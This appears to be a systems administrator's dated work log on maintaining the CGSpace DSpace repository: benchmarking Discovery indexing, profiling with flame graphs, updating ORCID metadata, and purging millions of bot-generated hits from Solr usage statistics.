  • UptimeRobot told me that AReS Explorer crashed last night, so I logged into it, ran all updates, and rebooted it
  • Testing Discovery indexing speed on my local DSpace 6.3:

$ time schedtool -D -e ~/dspace63/bin/dspace index-discovery -b
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  3771.78s user 93.63s system 41% cpu 2:34:19.53 total
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  3360.28s user 82.63s system 38% cpu 2:30:22.07 total
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  4678.72s user 138.87s system 42% cpu 3:08:35.72 total
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  3334.19s user 86.54s system 35% cpu 2:41:56.73 total
+
  • DSpace 5.8 was taking about 1 hour (or less on this laptop), so this is 2–3 times longer!

$ time schedtool -D -e ~/dspace/bin/dspace index-discovery -b
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  299.53s user 69.67s system 20% cpu 30:34.47 total
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  270.31s user 69.88s system 19% cpu 29:01.38 total
+
  • Checking out the DSpace 6.x REST API query client
    • There is a tutorial that explains how it works, and I see it is very powerful because you can export a CSV of results in order to fix and re-upload them with batch import!
    • Custom queries can be added in dspace-rest/src/main/webapp/static/reports/restQueryReport.js
  • I noticed two new bots in the logs with the following user agents:
    • Jersey/2.6 (HttpUrlConnection 1.8.0_152)
    • magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
  • I filed an issue to add Jersey to the COUNTER-Robots list
  • Peter noticed that the statlets on community, collection, and item pages aren’t working on CGSpace
    • I thought it might be related to the fact that the yearly sharding didn’t complete successfully this year, so the statistics-2019 core is empty
    • I removed the statistics-2019 core and had to restart Tomcat like six times before all cores would load properly (ugh!!!!)
    • After that the statlets were working properly…
  • Run all system updates on DSpace Test (linode19) and restart it

2020-02-06

  • I sent a mail to the dspace-tech mailing list asking about the slow Discovery indexing speed in DSpace 6
  • I destroyed my PostgreSQL 9.6 containers and re-created them using PostgreSQL 10 to see if there are any speedups with DSpace 6.x:

$ podman pull postgres:10-alpine
+$ podman run --name dspacedb10 -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:10-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
+$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
+$ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
+$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
+$ psql -h localhost -U postgres dspace63                               
+dspace63=# CREATE EXTENSION pgcrypto;
+dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
+dspace63=# DROP VIEW eperson_metadata;
+dspace63=# \q
+
  • I purged ~33,000 hits from the “Jersey/2.6” bot in CGSpace’s statistics using my check-spider-hits.sh script:

$ ./check-spider-hits.sh -d -p -f /tmp/jersey -s statistics -u http://localhost:8081/solr
+$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s "statistics-${year}" -u http://localhost:8081/solr; done
+
  • I noticed another user agent in the logs that we should add to the list:

ReactorNetty/0.9.2.RELEASE
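
  • If we end up purging its hits too, presumably the same check-spider-hits.sh approach as above would work; a sketch (the /tmp/reactornetty file is hypothetical and would contain that user agent pattern):

$ ./check-spider-hits.sh -d -p -f /tmp/reactornetty -s statistics -u http://localhost:8081/solr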
  • I exported the 2019-01 statistics from the Solr statistics core to JSON so I could test importing them into a separate yearly core:

$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f 'dateYearMonth:2019-01' -k uid
+$ ls -lh /tmp/statistics-2019-01.json
+-rw-rw-r-- 1 aorth aorth 3.7G Feb  6 09:26 /tmp/statistics-2019-01.json
+
  • Then I tested importing this by creating a new core in my development environment:

$ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace/solr/statistics&dataDir=/home/aorth/dspace/solr/statistics-2019/data'
+$ ./run.sh -s http://localhost:8080/solr/statistics-2019 -a import -o ~/Downloads/statistics-2019-01.json -k uid
+
  • This imports the records into the core, but DSpace can’t see them, and when I restart Tomcat the core is not seen by Solr…
  • I got the core to load by adding it to dspace/solr/solr.xml manually, i.e.:

  <cores adminPath="/admin/cores">
+  ...
+    <core name="statistics" instanceDir="statistics" />
+    <core name="statistics-2019" instanceDir="statistics">
+        <property name="dataDir" value="/home/aorth/dspace/solr/statistics-2019/data" />
+    </core>
+  ...
+  </cores>
+
  • But I don’t like having to do that… why doesn’t it load automatically?
  • I sent a mail to the dspace-tech mailing list to ask about it
  • Just for fun I tried to load these stats into a Solr 7.7.2 instance using the DSpace 7 Solr config
  • First, create a Solr statistics core using the DSpace 7 config:

$ ./bin/solr create_core -c statistics -d ~/src/git/DSpace/dspace/solr/statistics/conf -p 8983
+
  • Then try to import the stats, skipping a shitload of fields that are apparently added to our Solr statistics by Atmire modules:

$ ./run.sh -s http://localhost:8983/solr/statistics -a import -o ~/Downloads/statistics-2019-01.json -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
+
  • OK, that imported! I wonder if it works… maybe I’ll try another day

2020-02-07

  • Set up perf-map-agent and FlameGraph to generate flame graphs of the DSpace Discovery indexing process:

$ cd ~/src/git/perf-map-agent
+$ cmake     .
+$ make
+$ ./bin/create-links-in ~/.local/bin
+$ export FLAMEGRAPH_DIR=/home/aorth/src/git/FlameGraph
+$ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
+$ export JAVA_OPTS="-XX:+PreserveFramePointer"
+$ ~/dspace63/bin/dspace index-discovery -b &
+# pid of tomcat java process
+$ perf-java-flames 4478
+# pid of java indexing process
+$ perf-java-flames 11359
+
  • All Java processes need to have -XX:+PreserveFramePointer if you want to trace their methods
  • I did the same tests against DSpace 5.8 and 6.4-SNAPSHOT’s CLI indexing process and Tomcat process
    • For what it’s worth, it appears all the Hibernate stuff is in the CLI processes, so we don’t need to trace the Tomcat process
  • Here is the flame graph for DSpace 5.8’s dspace index-discovery -b java process:

DSpace 5.8 index-discovery flame graph

+
    +
  • Here is the flame graph for DSpace 6.4-SNAPSHOT’s dspace index-discovery -b java process:
  • +
+

DSpace 6.4-SNAPSHOT index-discovery flame graph

+
    +
  • If the width of the stacks indicates time, then it’s clear that Hibernate takes longer…
  • +
  • Apparently there is a “flame diff” tool, I wonder if we can use that to compare!
  • +
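  • If I understand it correctly, the FlameGraph repository has a difffolded.pl script for exactly that, so the comparison would be roughly like this (the input file names here are just placeholders for the two perf script outputs):
  • +
+
$ cat out.dspace58 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' > dspace58.folded
+$ cat out.dspace64 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' > dspace64.folded
+$ ../FlameGraph/difffolded.pl dspace58.folded dspace64.folded | ../FlameGraph/flamegraph.pl > diff.svg
+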
+

2020-02-09

+
    +
  • This weekend I did a lot more testing of indexing performance with our DSpace 5.8 branch, vanilla DSpace 5.10, and vanilla DSpace 6.4-SNAPSHOT:
  • +
+
# CGSpace 5.8
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  385.72s user 131.16s system 19% cpu 43:21.18 total
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  382.95s user 127.31s system 20% cpu 42:10.07 total
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  368.56s user 143.97s system 20% cpu 42:22.66 total
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  360.09s user 104.03s system 19% cpu 39:24.41 total
+
+# Vanilla DSpace 5.10
+schedtool -D -e ~/dspace510/bin/dspace index-discovery -b  236.19s user 59.70s system 3% cpu 2:03:31.14 total
+schedtool -D -e ~/dspace510/bin/dspace index-discovery -b  232.41s user 50.38s system 3% cpu 2:04:16.00 total
+
+# Vanilla DSpace 6.4-SNAPSHOT
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  5112.96s user 127.80s system 40% cpu 3:36:53.98 total
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  5112.96s user 127.80s system 40% cpu 3:21:0.0 total
+
    +
  • I generated better flame graphs for the DSpace indexing process by using perf-record-stack and filtering out the java process:
  • +
+
$ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
+$ export PERF_RECORD_SECONDS=60
+$ export JAVA_OPTS="-XX:+PreserveFramePointer"
+$ time schedtool -D -e ~/dspace/bin/dspace index-discovery -b &
+# process id of java indexing process (not Tomcat)
+$ perf-java-record-stack 169639
+$ sudo perf script -i /tmp/perf-169639.data > out.dspace510-1
+$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' | ../FlameGraph/flamegraph.pl --color=java --hash > out.dspace510-1.svg
+
    +
  • All data recorded on my laptop with the same kernel, same boot, etc.
  • +
  • CGSpace 5.8 (with Atmire patches):
  • +
+

DSpace 5.8 (with Atmire modules) index-discovery flame graph

+
    +
  • Vanilla DSpace 5.10:
  • +
+

Vanilla DSpace 5.10 index-discovery flame graph

+
    +
  • Vanilla DSpace 6.4-SNAPSHOT:
  • +
+

Vanilla DSpace 6.4-SNAPSHOT index-discovery flame graph

+
    +
  • I sent my feedback to the dspace-tech mailing list so someone can hopefully comment.
  • +
  • Last week Peter asked Sisay to upload some items to CGSpace in the GENNOVATE collection (part of Gender CRP) + +
  • +
+

2020-02-10

+
    +
  • Follow up with Atmire about DSpace 6.x upgrade +
      +
    • I raised the issue of targeting 6.4-SNAPSHOT as well as the Discovery indexing performance issues in 6.x
    • +
    +
  • +
+

2020-02-11

+
    +
  • Maria from Bioversity asked me to add some ORCID iDs to our controlled vocabulary so I combined them with our existing ones and updated the names from the ORCID API:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-02-11-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2020-02-11-combined-orcids.txt -o /tmp/2020-02-11-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • Then I noticed some author names had changed, so I captured the old and new names in a CSV file and fixed them using fix-metadata-values.py:
  • +
+
$ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -t correct -m 240 -d
+
    +
  • On a hunch I decided to try to add these ORCID iDs to existing items that might not have them yet +
      +
    • I checked the database for likely matches to the author name and then created a CSV with the author names and ORCID iDs:
    • +
    +
  • +
+
dc.contributor.author,cg.creator.id
+"Staver, Charles",charles staver: 0000-0002-4532-6077
+"Staver, C.",charles staver: 0000-0002-4532-6077
+"Fungo, R.",Robert Fungo: 0000-0002-4264-6905
+"Remans, R.",Roseline Remans: 0000-0003-3659-8529
+"Remans, Roseline",Roseline Remans: 0000-0003-3659-8529
+"Rietveld A.",Anne Rietveld: 0000-0002-9400-9473
+"Rietveld, A.",Anne Rietveld: 0000-0002-9400-9473
+"Rietveld, A.M.",Anne Rietveld: 0000-0002-9400-9473
+"Rietveld, Anne M.",Anne Rietveld: 0000-0002-9400-9473
+"Fongar, A.",Andrea Fongar: 0000-0003-2084-1571
+"Müller, Anna",Anna Müller: 0000-0003-3120-8560
+"Müller, A.",Anna Müller: 0000-0003-3120-8560
+
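    +
  • A sketch of the kind of query used to find those likely matches in the database (metadata field 3 is dc.contributor.author; the surname is just an example):
  • +
+
$ psql dspace -c "SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE 'Rietveld%';"
+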
    +
  • Running the add-orcid-identifiers-csv.py script I added 144 ORCID iDs to items on CGSpace!
  • +
+
$ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • Minor updates to all Python utility scripts in the CGSpace git repository
  • +
  • Update the spider agent patterns in CGSpace 5_x-prod branch from the latest COUNTER-Robots project +
      +
    • I ran the check-spider-hits.sh script with the updated file and purged 6,000 hits from our Solr statistics core on CGSpace
    • +
    +
  • +
+

2020-02-12

+
    +
  • Follow up with people about AReS funding for next phase
  • +
  • Peter asked about the “stats” and “summary” reports that he had requested in December + +
  • +
  • Peter asked me to update John McIntire’s name format on CGSpace so I ran the following PostgreSQL query:
  • +
+
dspace=# UPDATE metadatavalue SET text_value='McIntire, John M.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='McIntire, John';
+UPDATE 26
+

2020-02-17

+
    +
  • A few days ago Atmire responded to my question about DSpace 6.4-SNAPSHOT saying that they can only confirm that 6.3 works with their modules +
      +
    • I responded to say that we agree to target 6.3, but that I will cherry-pick important patches from the dspace-6_x branch at our own risk
    • +
    +
  • +
  • Send a message to dspace-devel asking them to tag DSpace 6.4
  • +
  • Udana from IWMI asked about the OAI base URL for their community on CGSpace + +
  • +
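  • For reference, harvesting a single community over OAI just means passing its handle (with underscores) as the set, so a request looks roughly like this (the community handle here is only an example):
  • +
+
$ curl -s 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&metadataPrefix=oai_dc&set=com_10568_16814'
+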
+

2020-02-19

+
    +
  • I noticed a thread on the mailing list about the Tomcat header size and Solr max boolean clauses error +
      +
    • The solution is to do as we have done and increase the headers / boolean clauses, or to simply disable access rights awareness in Discovery
    • +
    • I applied the fix to the 5_x-prod branch and cherry-picked it to 6_x-dev
    • +
    +
  • +
  • Upgrade Tomcat from 7.0.99 to 7.0.100 in Ansible infrastructure playbooks
  • +
  • Upgrade PostgreSQL JDBC driver from 42.2.9 to 42.2.10 in Ansible infrastructure playbooks
  • +
  • Run Tomcat and PostgreSQL JDBC driver updates on DSpace Test (linode19)
  • +
+

2020-02-23

+
    +
  • I see a new spider in the nginx logs on CGSpace:
  • +
+
Mozilla/5.0 (compatible;Linespider/1.1;+https://lin.ee/4dwXkTH)
+
    +
  • I think this should be covered by the COUNTER-Robots patterns for the statistics at least…
  • +
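  • If I want to see whether it has already left hits in Solr I can use check-spider-hits.sh with a one-line pattern file and no -p, for example:
  • +
+
$ echo 'Linespider' > /tmp/linespider
+$ ./check-spider-hits.sh -d -f /tmp/linespider -s statistics -u http://localhost:8081/solr
+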
  • I see some IP (186.32.217.255) in Costa Rica making requests like a bot with the following user agent:
  • +
+
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
+
    +
  • Another IP address (31.6.77.23) in the UK making a few hundred requests without a user agent
  • +
  • I will add the IP addresses to the nginx badbots list
  • +
  • 31.6.77.23 is in the UK and judging by its DNS it belongs to a web marketing company called Bronco +
      +
    • I looked for its DNS entry in Solr statistics and found a few hundred thousand hits over the years:
    • +
    +
  • +
+
$ curl -s "http://localhost:8081/solr/statistics/select" -d "q=dns:/squeeze3.bronco.co.uk./&rows=0"
+<?xml version="1.0" encoding="UTF-8"?>
+<response>
+<lst name="responseHeader"><int name="status">0</int><int name="QTime">4</int><lst name="params"><str name="q">dns:/squeeze3.bronco.co.uk./</str><str name="rows">0</str></lst></lst><result name="response" numFound="86044" start="0"></result>
+</response>
+
    +
  • The totals in each core are: +
      +
    • statistics: 86044
    • +
    • statistics-2018: 65144
    • +
    • statistics-2017: 79405
    • +
    • statistics-2016: 121316
    • +
    • statistics-2015: 30720
    • +
    • statistics-2014: 4524
    • +
    • … so about 387,000 hits!
    • +
    +
  • +
  • I will purge them from each core one by one, ie:
  • +
+
$ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
+$ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
+
    +
  • Deploy latest Tomcat and PostgreSQL JDBC driver changes on CGSpace (linode18)
  • +
  • Deploy latest 5_x-prod branch on CGSpace (linode18)
  • +
  • Run all system updates on CGSpace (linode18) server and reboot it +
      +
    • After the server came back up Tomcat started, but there were errors loading some Solr statistics cores
    • +
    • Luckily after restarting Tomcat once more they all came back up
    • +
    +
  • +
  • I ran the dspace cleanup -v process on CGSpace and got an error:
  • +
+
Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(183996) is still referenced from table "bundle".
+
    +
  • The solution is, as always:
  • +
+
# su - postgres
+$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
+UPDATE 1
+
    +
  • Add one more Bioversity ORCID iD to the controlled vocabulary on CGSpace
  • +
  • Felix Shaw from Earlham emailed me to ask about his admin account on DSpace Test +
      +
    • His old one got lost when I re-sync’d DSpace Test with CGSpace a few weeks ago
    • +
    • I added a new account for him and added it to the Administrators group:
    • +
    +
  • +
+
$ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
+
    +
  • For some reason the Atmire Content and Usage Analysis (CUA) module’s Usage Statistics is drawing blank graphs +
      +
    • I looked in the dspace.log and see:
    • +
    +
  • +
+
2020-02-23 11:28:13,696 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoClassDefFoundError: Could not
+ initialize class org.jfree.chart.JFreeChart
+
    +
  • The same error happens on DSpace Test, but graphs are working on my local instance +
      +
    • The only thing I’ve changed recently is the Tomcat version, but it’s working locally…
    • +
    • I see the following file on my local instance, CGSpace, and DSpace Test: dspace/webapps/xmlui/WEB-INF/lib/jfreechart-1.0.5.jar
    • +
    • I deployed Tomcat 7.0.99 on DSpace Test but the JFreeChart class still can’t be found…
    • +
    • So it must be something with the library search path…
    • +
    • Strange it works with Tomcat 7.0.100 on my local machine
    • +
    +
  • +
  • I copied the jfreechart-1.0.5.jar file to the Tomcat lib folder and then there was a different error when I loaded Atmire CUA:
  • +
+
2020-02-23 16:25:10,841 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!  org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.awt.AWTError: Assistive Technology not found: org.GNOME.Accessibility.AtkWrapper
+
    +
  • Some search results suggested commenting out the following line in /etc/java-8-openjdk/accessibility.properties:
  • +
+
assistive_technologies=org.GNOME.Accessibility.AtkWrapper
+
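    +
  • A one-liner to do that non-interactively (assuming the stock Ubuntu file path above):
  • +
+
$ sudo sed -i 's/^assistive_technologies=/#assistive_technologies=/' /etc/java-8-openjdk/accessibility.properties
+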
    +
  • After removing the extra jfreechart library and restarting Tomcat I was able to load the usage statistics graph on DSpace Test… +
      +
    • Hmm, actually I think this is a Java bug, perhaps introduced in or at least present on Ubuntu 18.04, with lots of references to it happening in other configurations like Debian 9 with Jenkins, etc…
    • +
    • Apparently if you use the non-headless version of openjdk this doesn’t happen… but that pulls in X11 stuff so no thanks
    • +
    • Also, I see dozens of occurrences of this going back over one month (we have logs for about that period):
    • +
    +
  • +
+
# grep -c 'initialize class org.jfree.chart.JFreeChart' dspace.log.2020-0*
+dspace.log.2020-01-12:4
+dspace.log.2020-01-13:66
+dspace.log.2020-01-14:4
+dspace.log.2020-01-15:36
+dspace.log.2020-01-16:88
+dspace.log.2020-01-17:4
+dspace.log.2020-01-18:4
+dspace.log.2020-01-19:4
+dspace.log.2020-01-20:4
+dspace.log.2020-01-21:4
+...
+
    +
  • I deployed the fix on CGSpace (linode18) and I was able to see the graphs in the Atmire CUA Usage Statistics…
  • +
  • On an unrelated note, something weird is going on: I see millions of hits from IP 34.218.226.147 in Solr statistics, but if I remember correctly that IP belongs to CodeObia’s AReS explorer, which should only be using REST and therefore should not generate any Solr statistics…?
  • +
+
$ curl -s "http://localhost:8081/solr/statistics-2018/select" -d "q=ip:34.218.226.147&rows=0"
+<?xml version="1.0" encoding="UTF-8"?>
+<response>
+<lst name="responseHeader"><int name="status">0</int><int name="QTime">811</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="rows">0</str></lst></lst><result name="response" numFound="5536097" start="0"></result>
+</response>
+
    +
  • And there are apparently two million from last month (2020-01):
  • +
+
$ curl -s "http://localhost:8081/solr/statistics/select" -d "q=ip:34.218.226.147&fq=dateYearMonth:2020-01&rows=0"
+<?xml version="1.0" encoding="UTF-8"?>
+<response>
+<lst name="responseHeader"><int name="status">0</int><int name="QTime">248</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="fq">dateYearMonth:2020-01</str><str name="rows">0</str></lst></lst><result name="response" numFound="2173455" start="0"></result>
+</response>
+
    +
  • But when I look at the nginx access logs for the past month or so I only see 84,000, all of which are on /rest and none of which are to XMLUI:
  • +
+
# zcat /var/log/nginx/*.log.*.gz | grep -c 34.218.226.147
+84322
+# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c '/rest'
+84322
+
    +
  • Either the requests didn’t get logged, or there is some mixup with the Solr documents (fuck!) +
      +
    • On second inspection, I do see lots of notes here about 34.218.226.147, including 150,000 on one day in October, 2018 alone…
    • +
    +
  • +
  • To make matters worse, I see hits from REST in the regular nginx access log! +
      +
    • I did a few tests and I can’t figure it out, but it seems that hits appear in either the REST log or the access log (not both)
    • +
    • Also, I see zero hits to /rest in the access.log on DSpace Test (linode19)
    • +
    +
  • +
  • Anyways, I faceted by IP in 2020-01 and see:
  • +
+
$ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-01&rows=0&wt=json&indent=true&facet=true&facet.field=ip'
+...
+        "172.104.229.92",2686876,
+        "34.218.226.147",2173455,
+        "163.172.70.248",80945,
+        "163.172.71.24",55211,
+        "163.172.68.99",38427,
+
    +
  • Surprise surprise, the top two IPs are from AReS servers… wtf.
  • +
  • The next three are from Online.net in France and they are all using this weird user agent and making tens of thousands of requests to Discovery:
  • +
+
Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+
    +
  • And all the same three are already inflating the statistics for 2020-02… hmmm.
  • +
  • I need to see why AReS harvesting is inflating the stats, as it should only be making REST requests…
  • +
  • Shiiiiit, I see 84,000 requests from the AReS IP today alone:
  • +
+
$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&rows=0&wt=json&indent=true'
+...
+  "response":{"numFound":84594,"start":0,"docs":[]
+
    +
  • Fuck! And of course the ILRI websites doing their daily REST harvesting are causing issues too, from today alone:
  • +
+
        "2a01:7e00::f03c:91ff:fe9a:3a37",35512,
+        "2a01:7e00::f03c:91ff:fe18:7396",26155,
+
    +
  • I need to try to make some requests for these URLs and observe if they make a statistics hit: +
      +
    • /rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=82450
    • +
    • /rest/handle/10568/28702?expand=all
    • +
    +
  • +
  • Those are the requests AReS and ILRI servers are making… nearly 150,000 per day!
  • +
  • Well that settles it!
  • +
+
$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
+  "response":{"numFound":12,"start":0,"docs":[
+$ curl -s 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=82450'
+$ curl -s 'http://localhost:8081/solr/statistics/update?softCommit=true'
+$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
+  "response":{"numFound":62,"start":0,"docs":[
+
    +
  • A REST request with limit=50 will make exactly fifty statistics_type=view statistics in the Solr core… fuck. +
      +
    • So not only do I need to purge all these millions of hits, we need to add these IPs to the list of spider IPs so they don’t get recorded
    • +
    +
  • +
+

2020-02-24

+
    +
  • I tried to add some IPs to the DSpace spider list so they would not get recorded in Solr statistics, but it doesn’t support IPv6 +
      +
    • A better method is actually to just use the nginx mapping logic we already have to reset the user agent for these requests to “bot”
    • +
    • That, or to really insist that users harvesting us specify some kind of user agent
    • +
    +
  • +
  • I tried to add the IPs to our nginx IP bot mapping but it doesn’t seem to work… WTF, why is everything broken?!
  • +
  • Oh lord have mercy, the two AReS harvester IPs alone are responsible for 42 MILLION hits in 2019 and 2020 so far by themselves:
  • +
+
$ http 'http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&rows=0&wt=json&indent=true' | grep numFound
+  "response":{"numFound":42395486,"start":0,"docs":[]
+
    +
  • I modified my check-spider-hits.sh script to create a version that works with IPs and purged 47 million stats from Solr on CGSpace:
  • +
+
$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f 2020-02-24-bot-ips.txt -s statistics -p
+Purging 22809216 hits from 34.218.226.147 in statistics
+Purging 19586270 hits from 172.104.229.92 in statistics
+Purging 111137 hits from 2a01:7e00::f03c:91ff:fe9a:3a37 in statistics
+Purging 271668 hits from 2a01:7e00::f03c:91ff:fe18:7396 in statistics
+
+Total number of bot hits purged: 42778291
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f 2020-02-24-bot-ips.txt -s statistics-2018 -p
+Purging 5535399 hits from 34.218.226.147 in statistics-2018
+
+Total number of bot hits purged: 5535399
+
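    +
  • The heart of the IP version is just a loop that counts and then deletes by query for each IP in the file; a minimal sketch (not the actual script), assuming a single core at a time:
  • +
+
#!/usr/bin/env bash
+# minimal sketch: count and purge Solr statistics hits for each IP in a file
+solr_url="http://localhost:8081/solr"
+core="statistics"
+while read -r ip; do
+    # quote the IP so IPv6 colons don't confuse the Solr query parser
+    hits=$(curl -s "${solr_url}/${core}/select" -d "q=ip:\"${ip}\"&rows=0" | grep -oE 'numFound="[0-9]+"' | grep -oE '[0-9]+')
+    echo "Purging ${hits} hits from ${ip} in ${core}"
+    curl -s "${solr_url}/${core}/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>ip:\"${ip}\"</query></delete>"
+done < 2020-02-24-bot-ips.txt
+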
    +
  • (The statistics core holds 2019 and 2020 stats, because the yearly sharding process failed this year)
  • +
  • Attached is a before and after of the period from 2019-01 to 2020-02:
  • +
+

CGSpace stats for 2019 and 2020 before the purge

+

CGSpace stats for 2019 and 2020 after the purge

+
    +
  • And here is a graph of the stats by year since 2011:
  • +
+

CGSpace stats by year since 2011 after the purge

+
    +
  • I’m a little suspicious of the 2012, 2013, and 2014 numbers, though +
      +
    • I should facet those years by IP and see if any stand out…
    • +
    +
  • +
  • The next thing I need to do is figure out why the nginx IP to bot mapping isn’t working… +
      +
    • Actually (and I’ve probably learned this before) the bot mapping is working, but nginx only logs the real user agent (of course!), since I’m only using the mapped one in the proxy pass…
    • +
    • This trick for adding a header with the mapped “ua” variable is nice:
    • +
    +
  • +
+
add_header X-debug-message "ua is $ua" always;
+
    +
  • Then in the HTTP response you see:
  • +
+
X-debug-message: ua is bot
+
    +
  • So the IP to bot mapping is working, phew.
  • +
  • More bad news, I checked the remaining IPs in our existing bot IP mapping, and there are statistics registered for them! +
      +
    • For example, ciat.cgiar.org was previously 104.196.152.243, but it is now 35.237.175.180, which I had noticed as a “mystery” client on Google Cloud in 2018-09
    • +
    • Others I should probably add to the nginx bot map list are: +
        +
      • wle.cgiar.org (70.32.90.172)
      • +
      • ccafs.cgiar.org (205.186.128.185)
      • +
      • another CIAT scraper using the PHP GuzzleHttp library (45.5.184.72)
      • +
      • macaronilab.com (63.32.242.35)
      • +
      • africa-rising.net (162.243.171.159)
      • +
      +
    • +
    +
  • +
  • These IPs are all active in the REST API logs over the last few months and they account for three to four million more hits in the statistics!
  • +
  • I purged them from CGSpace:
  • +
+
$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics -p
+Purging 15 hits from 104.196.152.243 in statistics
+Purging 61064 hits from 35.237.175.180 in statistics
+Purging 1378 hits from 70.32.90.172 in statistics
+Purging 28880 hits from 205.186.128.185 in statistics
+Purging 464613 hits from 63.32.242.35 in statistics
+Purging 131 hits from 162.243.171.159 in statistics
+
+Total number of bot hits purged: 556081
